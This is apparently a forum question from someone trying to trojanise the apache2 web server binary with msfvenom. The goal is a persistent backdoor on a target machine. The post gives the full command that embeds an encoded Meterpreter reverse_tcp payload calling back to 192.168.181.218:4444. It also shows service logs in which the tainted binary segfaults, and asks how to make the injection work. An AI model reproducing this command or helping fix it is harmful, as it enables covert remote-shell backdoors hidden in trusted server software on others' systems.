I've been trying to use msfvenom with the linux/x86/meterpreter/reverse_tcp payload and an apache2 binary. My intent is to create a tainted version of apache2 to establish a persistent backdoor on the target machine. Below is the general command I've been trying:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.181.218 LPORT=4444 -f elf -e x86/shikata_ga_nai -x ./apache2 -o ./apache2_hacked
I then copy the apache2_hacked binary to the proper location and attempt to start it with service apache2 start. This results in a seg fault.
root@kali:~# service apache2 start
Job for apache2.service failed. See 'systemctl status apache2.service' and 'journalctl -xn' for details.
root@kali:~# systemctl status apache2.service
● apache2.service - LSB: Apache2 web server
Loaded: loaded (/etc/init.d/apache2)
Active: failed (Result: exit-code) since Fri 2015-09-18 15:49:24 EDT; 3min 37s ago
Process: 3446 ExecStart=/etc/init.d/apache2 start (code=exited, status=1/FAILURE)
Sep 18 15:49:24 kali apache2[3446]: Starting web server: apache2 failed!
Sep 18 15:49:24 kali apache2[3446]: The apache2 configtest failed. ... (warning).
Sep 18 15:49:24 kali apache2[3446]: Output of config test was:
Sep 18 15:49:24 kali apache2[3446]: Segmentation fault
Sep 18 15:49:24 kali apache2[3446]: Action 'configtest' failed.
Sep 18 15:49:24 kali apache2[3446]: The Apache error log may have more information.
Sep 18 15:49:24 kali systemd[1]: apache2.service: control process exited, code=exited status=1
Sep 18 15:49:24 kali systemd[1]: Failed to start LSB: Apache2 web server.
Sep 18 15:49:24 kali systemd[1]: Unit apache2.service entered failed state.
Am I using the tool correctly? Are there any restrictions on templates I need to be aware of? Is there something special about the apache2 binary that prevents injection attempts like this?